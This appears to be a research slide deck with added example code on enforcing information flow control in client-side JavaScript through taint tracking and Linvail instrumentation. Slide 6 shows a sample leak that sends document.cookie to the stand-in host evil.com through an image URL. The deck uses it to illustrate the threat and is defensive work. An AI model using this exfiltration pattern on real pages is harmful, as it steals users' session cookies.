Slide 1

Practical Information Flow Control for Client-Side Web Applications

Angel Luis Scull Pupo, Jens Nicolay, Elisa Gonzalez Boix
{ascullpu, jens.nicolay, egonzale}@vub.be

Slide 2

Web applications today

[Figure: a page in the browser assembled from third-party components (Search, Advertising, Social Networking, Markup Frameworks, Template Engines, Password Strength Checkers) served alongside the application server.]

Slide 3

Browser security mechanisms: Same-Origin Policy

The Same-Origin Policy is a security mechanism for isolating potentially malicious resources.

• Content from different origins has limited interaction.
• Not suitable for context-sensitive components.
• Not suitable for tight integration of third-party services.

Slide 4

JavaScript inclusion is all or nothing

Password Strength Checker example: we need to share sensitive information but prevent it from leaking.

Slide 5

IFC to the Rescue

Slide 6

Information Flow Policies

Goal: Confidentiality. Secret data cannot flow to public sinks.

    let leak = document.cookie;
    // …
    let img = document.createElement('img');
    // …
    img.src = "http://evil.com?q=" + leak;

Evaluation metrics:
• Soundness
• Transparency
• Permissiveness (precision)

Slide 7

Types of Information Flow

Explicit:

    let password = document.getElementById("pass").value;
    let dummy = password.substring(4);
    console.log(dummy);

Implicit:

    let secret = 12;
    let public = 5;
    if (secret) {
      public = 4;
    }
    console.log(public);

The attacker can learn one bit of the secret.

Slide 8

Approaches for IFC in JavaScript: Static Analysis

• No runtime overhead.
• Can explore all paths of the execution.
• Has access to approximate values of the execution.
• JavaScript dynamic code evaluation is a challenge.
• Aliasing of objects is a challenge.

Slide 9

Approaches for IFC in JavaScript: Dynamic Analysis

• Has access to exact runtime values.
• Can handle dynamic code evaluation.
• Aliasing does not represent a problem.
• Has an impact on the performance of the system.
• Has access to one path of the execution.

Slide 10

Dynamic IFC Approaches

Title                            | Approach            | Granularity | Language         | Implementation
---------------------------------|---------------------|-------------|------------------|---------------
LeGuernic 2007                   | Automata            | Fine        | Sequential       | -
SME 2010*                        | Parallel Executions | Fine        | Any (JavaScript) | Interpreter
IFC for Core JS 2012             | Dyn. Type System    | Fine        | JavaScript       | Op. Semantics
JSFlow 2014                      | Dynamic             | Fine        | JavaScript       | Interpreter
COWL 2014                        | Dynamic             | Coarse      | JavaScript       | Interpreter
Value-sensitive Hybrid IFC 2015  | Dynamic + Static    | Fine        | JavaScript       | Op. Semantics
Inlined IFC Monitor 2015, 2016   | Dynamic + Static    | Fine        | JavaScript       | Instrumented

Slide 11

Dynamic IFC without VM modification

Slide 12

Characteristics of Guardia

• Internal DSL.
• Declarative.
• Specification decoupled from enforcement.
• No interpreter modification.

    G.installPolicy({
      whenRead: [G.Not(G.And(G.Allow(['createElement']),
                             G.ParamAt(equals, G.getVType(0, String), 'iframe')))]
    }).on(document)

Slide 13

IFC in Guardia: Goals

• Purely dynamic IFC analysis.
• Support for explicit and implicit IFC.
• Portable across different browsers.

Slide 14

Dynamic IFC in Guardia

Explicit flows: associate a security label with each object.

    let a = 6;
    let c = a / 2;

Implicit flows: associate a security label with the PC (the execution context).
• No Sensitive Upgrade (NSU)
• Permissive Upgrade (PU)

    let a = 6;
    let b = true;
    if (b) {
      a = 9;
    }

Slide 15

Enforcement

Slide 16

Explicit IFC tracking

A taint analysis technique is used to handle explicit IFC. We need a means to track tainted data: a taint flag is added to program values.

    // …
    var age = document.getElementById("age").value;   // Taint
    var res = age / group;                            // Track
    // …
    console.log(group);
    // …
    console.log(res);                                 // Enforce

Slide 17

Handling implicit flows: the Permissive Upgrade approach [1]

Labels: L ⊆ H ⊆ P. PU introduces a partially leaked data label (P).

[1] T. H. Austin and C. Flanagan, "Permissive dynamic information flow analysis," PLAS, pp. 1–12, 2010.

Slide 18

Dynamic taint analysis using code instrumentation

Linvail as instrumentation platform:
• Provides a transparent analysis layer.
• Allows tagging runtime values regardless of their types:
  - 2, true, 'Hello World'
  - {name: "John"}
• Provides life-long value tracking.

[Figure: Linvail separates an internal world (the instrumented program) from the external world (uninstrumented code such as var y = Math.sqrt(x); or var str = JSON.stringify(obj);). Values, including composite data, cross the boundary through Harmony proxy traps: get, set, apply.]

Slide 19

Taint analysis with Linvail

Base program:

    var age = document.getElementById("age").value;
    var res = age / 20;
    console.log(res);

Instrumented by Linvail:

    _meta_.__global__ = _meta_.__global__ || (function () { return this }());
    _meta_.__eval__ = _meta_.__eval__ || eval;
    _meta_.__apply__ = _meta_.__apply__ ||
      (typeof Reflect === 'object' ? Reflect.apply : function (f, t, xs) { return f.apply(t, xs) });
    _meta_.__defineProperty__ = _meta_.__defineProperty__ || Object.defineProperty;
    _meta_.primitive(void 0, 1);
    var taintedVal;
    (taintedVal = _meta_.apply(_meta_taint, null, [_meta_.primitive(42, 5)], 3));
    var res;
    (res = _meta_.binary("*", taintedVal, _meta_.primitive(7, 9), 7));
    _meta_.apply(_meta_.get((_meta_1 = console), _meta_.primitive("log", 11), 11), _meta_1, [res], 11);

IFC analysis (the instrumented program runs against this meta layer):

    function enter(val, idx, ctx) {
      // Wrap primitives so they can carry analysis metadata.
      if (isprimitive(val)) {
        val = { inner: val };
        wrappers.add(val);
        pointers.set(val, ++counter);
        return val;
      }
      return val;
    }
    function leave(val, idx, ctx) {
      // Unwrap on the way out to the external world.
      return wrappers.has(val) ? val.inner : val;
    }
    var linvail = Linvail(enter, leave);
    global._meta_ = {};
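The enter/leave boundary of slides 18 and 19, as an added example that is not Linvail's code or API: values inside the analysis are wrapped so they can carry a taint flag whatever their type, and a Proxy membrane unwraps them for uninstrumented code (Math, JSON) and re-wraps the results. The names enter, leave, isTainted and membrane are assumptions.

```javascript
// Added example, not Linvail's code: a toy membrane in the spirit of slides 18-19.
// Inside the analysis every value is wrapped as { inner, taint } so it can carry a
// tag whatever its type; Proxy traps unwrap values on the way out to uninstrumented
// code (Math, JSON) and re-wrap results on the way back in, propagating taint.
// enter/leave/isTainted/membrane are assumed names, not Linvail's API.
const wrappers = new WeakSet();                       // identifies our own wrappers

function enter(val, taint = false) {                  // raw value -> internal world
  const w = { inner: val, taint };
  wrappers.add(w);
  return w;
}
function leave(val) {                                 // internal world -> raw value
  return wrappers.has(val) ? val.inner : val;
}
function isTainted(val) {
  return wrappers.has(val) && val.taint === true;
}

// Wrap an external object so that calls made through it cross the membrane.
function membrane(target) {
  return new Proxy(target, {
    get(t, key) {
      const member = t[key];
      if (typeof member !== 'function') return member; // data props pass through unwrapped
      return new Proxy(member, {
        apply(fn, _thisArg, args) {
          const anyTainted = args.some(isTainted);           // taint of any argument...
          const raw = Reflect.apply(fn, t, args.map(leave)); // native code sees plain values
          return enter(raw, anyTainted);                     // ...flows into the result
        },
      });
    },
  });
}

const M = membrane(Math);
const J = membrane(JSON);

// Slide 18's two boundary crossings with constructed inputs. Wrappers nested inside
// composite data are not unwrapped here; that is the "composite data" case on the slide.
function demo() {
  const x = enter(16, true);                          // constructed: tainted primitive
  const y = M.sqrt(x);                                // var y = Math.sqrt(x)
  const obj = enter({ name: 'John' });                // constructed: untainted composite
  const str = J.stringify(obj);                       // var str = JSON.stringify(obj)
  return { y: leave(y), yTainted: isTainted(y), str: leave(str), strTainted: isTainted(str) };
}
```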

Slide 20

Taint analysis with Linvail

Linvail is used as a library and allows intercepting language operations. The base program's operations (binary, set, apply) are forwarded to the meta program, which performs the analysis:

    let global = {
      binary: function (o, l, r, i) {
        let res = linvail["binary"](o, l, r, i);
        res.taint = l.taint || r.taint;          // result is tainted if either operand is
        return res;
      },
      set: function (o, k, v, i) {
        let res = linvail["set"](o, k, v, i);
        res.taint = v.taint;                     // stored property inherits the value's taint
        return res;
      },
      apply: function (fn, ths, args, i) {
        if (isSink(fn) && isTainted(args)) {
          throw new Error('IFC violation!');
        } else {
          return linvail["apply"](fn, ths, args, i);
        }
      }
    }
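The label discipline of slides 14 to 17 (explicit flows, the pc label, NSU versus PU and the L ⊆ H ⊆ P lattice) worked through in a monitor whose hooks mirror the meta program on slide 20. This is an added example, not code from the slides, Guardia or Linvail; makeMonitor, lab, runImplicit and runExplicit are assumed names and the inputs are constructed.

```javascript
// Added example, not code from the slides, Guardia or Linvail: a toy monitor whose hooks
// mirror the meta program of slide 20 and implement the labels of slides 14-17. Explicit
// flows join operand labels; implicit flows raise a pc label inside branches, handled by
// No Sensitive Upgrade (halt) or Permissive Upgrade (continue, mark partially leaked).
const L = 0, H = 1, P = 2;                    // public, secret, partially leaked: L ⊆ H ⊆ P
const join = (a, b) => Math.max(a, b);        // least upper bound of two labels
const lab = (v, l = L) => ({ v, l });         // labeled value (assumed shape, all names assumed)
function makeMonitor(mode) {                  // mode: 'NSU' or 'PU'
  let pc = L;                                 // label of the enclosing control context
  return {
    binary(op, l, r) {                        // explicit flow: result joins operand labels and pc
      return lab(op === '/' ? l.v / r.v : l.v + r.v, join(join(l.l, r.l), pc));
    },
    // A branch raises pc to the condition's label; under PU a partially leaked value may not decide control flow.
    branch(cond, body) {
      if (cond.l === P) throw new Error('IFC violation: branch on partially leaked value');
      const saved = pc;
      pc = join(pc, cond.l);
      try { if (cond.v) body(); } finally { pc = saved; }
    },
    // Implicit flow: writing a non-secret variable under a secret pc. NSU halts; PU relabels it P.
    assign(env, name, val) {
      if (pc === H && env[name].l !== H) {
        if (mode === 'NSU') throw new Error('NSU: sensitive upgrade of ' + name);
        env[name] = lab(val.v, P);
        return;
      }
      env[name] = lab(val.v, join(val.l, pc));
    },
    sink(val) {                               // public sink (console.log, img.src): only L may pass
      if (val.l !== L) throw new Error('IFC violation: label ' + val.l + ' reaches a public sink');
      return val.v;
    },
  };
}
function runImplicit(mode) {                  // slide 7: if (secret) public = 4; console.log(public)
  const m = makeMonitor(mode);
  const env = { secret: lab(12, H), public: lab(5) };     // constructed inputs
  try {
    m.branch(env.secret, () => m.assign(env, 'public', lab(4)));
    return 'leaked ' + m.sink(env.public);
  } catch (e) { return e.message.startsWith('NSU') ? 'stopped by NSU' : 'blocked at sink'; }
}
function runExplicit() {                      // slide 16: res = age / 20 with age secret
  const m = makeMonitor('PU');
  const res = m.binary('/', lab(42, H), lab(20));           // constructed: age read as 42
  try { return 'leaked ' + m.sink(res); } catch (e) { return 'blocked at sink (label ' + res.l + ')'; }
}
```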

Slide 21

Challenges

• Handle the DOM API
  - We cannot instrument the DOM.
  - Function annotation is not possible because the DOM is stateful.
• Dynamic objects
  - Structure and existence of properties.
• Exceptions
  - Exceptions can be used to change the flow of the execution and learn a bit of information.
• Higher-order functions
  - Functions can leak information if they are created in sensitive contexts.
• Prototype chain
  - The prototype chain of an object can be used to encode and leak information.

Slide 22

Evaluation

• We are performing the evaluation using the language challenges presented earlier.
• Evaluation of performance, transparency and permissiveness is ongoing work.

Slide 23

Conclusions

• It is possible to enforce IFC policies without runtime modifications.
• It remains unclear how to protect the instrumented program from attacks.